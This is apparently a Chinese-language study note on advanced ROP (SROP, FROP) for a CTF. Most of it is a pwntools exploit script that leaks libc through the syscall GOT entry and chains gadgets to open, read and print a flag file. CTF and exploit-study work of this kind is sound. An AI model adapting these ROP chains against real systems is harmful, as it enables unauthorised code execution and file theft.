除了之前介绍的一般 ROP 之外，还有一些高级的运用：SROP 和 FROP。

srop

还没有完全学会，参考资料在我的导航里面。

from pwn import *
# pwntools settings: 64-bit packing for p64/u64 and verbose I/O logging.
context.arch = 'amd64'
context.log_level = 'debug'

# Fixed addresses inside the challenge binary (their meaning is only what the
# names say; they are not verifiable from this listing).  ``bss_addr`` is
# defined but never referenced further down in this file.
power_rop1, power_rop2 = 0x0000000000400806, 0x00000000004007F0
buf_inp, pop_rbp, bss_addr = (
    0x0000000000601039,
    0x0000000000400628,
    0x0000000000601050,
)
def getpower(avg1,avg2,avg3,got):
    """Pack the two ``power_rop`` gadget addresses, *got* and the three
    values into one 16-word chain.

    Every element is emitted as an 8-byte little-endian word (``p64``); the
    result is the raw ``bytes`` to append to a payload.
    """
    words = [power_rop1, 0, 0, 1, got, avg1, avg2, avg3, power_rop2]
    # Seven zero words trail the second gadget, not six: the original author
    # notes that besides the six pops there is an ``rsp+8`` adjustment first.
    words.extend([0] * 7)
    return b"".join(p64(w) for w in words)

# --- Target setup --------------------------------------------------------
# Run the challenge binary locally; the commented-out remote() line is the
# alternative endpoint the author used.
p=process('./pwn')


#p=remote("ctf.v50to.cc",10402)
# Symbol tables of the binary and of the bundled libc build; the libc
# offsets used below are specific to this exact libc-2.27.so file.
elf=ELF('pwn')
libc=ELF('./libc-2.27.so')
syscall_got=elf.got['syscall']
# Despite the name this is the symbol address, not a GOT slot; it is not
# referenced again in this listing.
seccomp_init_got=elf.symbols['seccomp_init']



# --- Stage 1 -------------------------------------------------------------
# 0x30 bytes of 'flag\0\0\0\0' filler, then p64(0x4007b0) (a constant that
# is not labelled anywhere in this file).
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=getpower(0,0,buf_inp,syscall_got)

payload+=getpower(1,1,syscall_got,syscall_got)
payload+=p64(pop_rbp)+p64(buf_inp+8)

# Another unlabelled binary address; it closes both stages.
payload+=p64(0x000000000040076D)

# Sent after the program prints a line ending in '!!!'.
p.sendlineafter(b'!!!\n',payload)
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendline(b'flag\x00\x00\x00\x00'+p64(0x601000))
# pause()


# --- Leak parsing --------------------------------------------------------
# Read up to and including the first 0x7f byte, take the last 6 bytes,
# zero-extend to 8 and unpack as the libc syscall() address.
recvaddr=p.recvuntil(b'\x7f')
sysaddr=u64(recvaddr[-6:].ljust(8,b'\x00'))
print(hex(sysaddr))
# libc base = leaked syscall() address minus its offset inside libc-2.27.so.
libcbase=sysaddr-libc.symbols['syscall']
print('libcbase',hex(libcbase))

# Libc-relative addresses (the raw offsets are hard-coded for this libc
# build).  open_addr/read_addr/write_addr and pop_rsp are only referenced in
# commented-out code below.
pop_rax=libcbase+0x000000000001b500
open_addr=libcbase+libc.symbols['open']
read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
pop_rdi=0x0000000000400813  # binary address, not libc-relative
pop_rdx_rsi=libcbase+0x0000000000130539
pop_rsp=libcbase+0x000000000000396c
pop_rcx=libcbase+0x00000000000e433e

# --- Stage 2 -------------------------------------------------------------
# Same 0x30-byte filler and 0x4007b0 word as stage 1, then three register
# set-ups (rax = 2, 0, 1 in turn), each ending at sysaddr+23, an offset into
# libc's syscall() that is not explained in this file.
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=p64(pop_rax)+p64(2)+p64(pop_rcx)+p64(0)
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=flat([pop_rdi,buf_inp,pop_rdx_rsi,0,0,pop_rbp,buf_inp+0x30,sysaddr+23])
payload+=p64(pop_rax)+p64(0)
payload+=flat([pop_rdi,3,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
payload+=p64(pop_rax)+p64(1)
payload+=flat([pop_rdi,1,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
# payload+=flat([pop_rdi,buf_inp-1,pop_rdx_rsi,0,0,open_addr])
# payload+=
payload+=p64(0x000000000040076D)
# Length is printed only for inspection; nothing checks it against a limit.
print('len',len(payload))
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendlineafter(b'!!!\n',payload)

# # pop_rax=libcbase+0x000000000001b500
# # payload2=

# Hand the connection over to the terminal.
p.interactive()

frop

就是 IO_FILE 的利用，相关资料在我的导航里面。